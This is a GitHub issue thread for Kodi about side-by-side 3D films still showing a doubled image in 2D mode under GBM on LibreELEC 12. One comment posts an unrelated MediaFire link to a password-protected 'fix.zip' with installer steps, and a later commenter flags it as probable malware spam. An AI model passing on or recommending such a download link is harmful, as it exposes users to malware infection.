### ISSUE TITLE
2D support for 3D movies

### ISSUE THREAD

**Issue by Voosjey** [xbmc/xbmc#25678]
**Bug report**
Describe the bug

I have an i5 12400 with 16 GB RAM, there runs librelec 12 with Kodi Omega . Basically, almost everything works, except for the 3D mode, if I want to watch a 3D movie in 2D, then the double image remains. In the legacy version I can watch the 3d movies in 2d, but the HDR support is gone. I hope that at least the 2D support for 3D movies comes in GBM.
If I want to watch an SBS video at GBM he should display it as 2D, he still shows the double images, if I then turn off the 2D mode, I suddenly have 4 pictures next to each other.
![20230131_200747](https://github.com/user-attachments/assets/101a22d1-da86-4970-a6a7-c7c540660a86)

**Debuglog**
no Log

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Voosjey** [comment]
what is that?

**Comment by quietvoid** [comment]
Please don't use that link, it is probably malware. The comment should be deleted.
There seems to be some wave of spam across GitHub projects.

**Comment by sarbes** [comment]
No response.
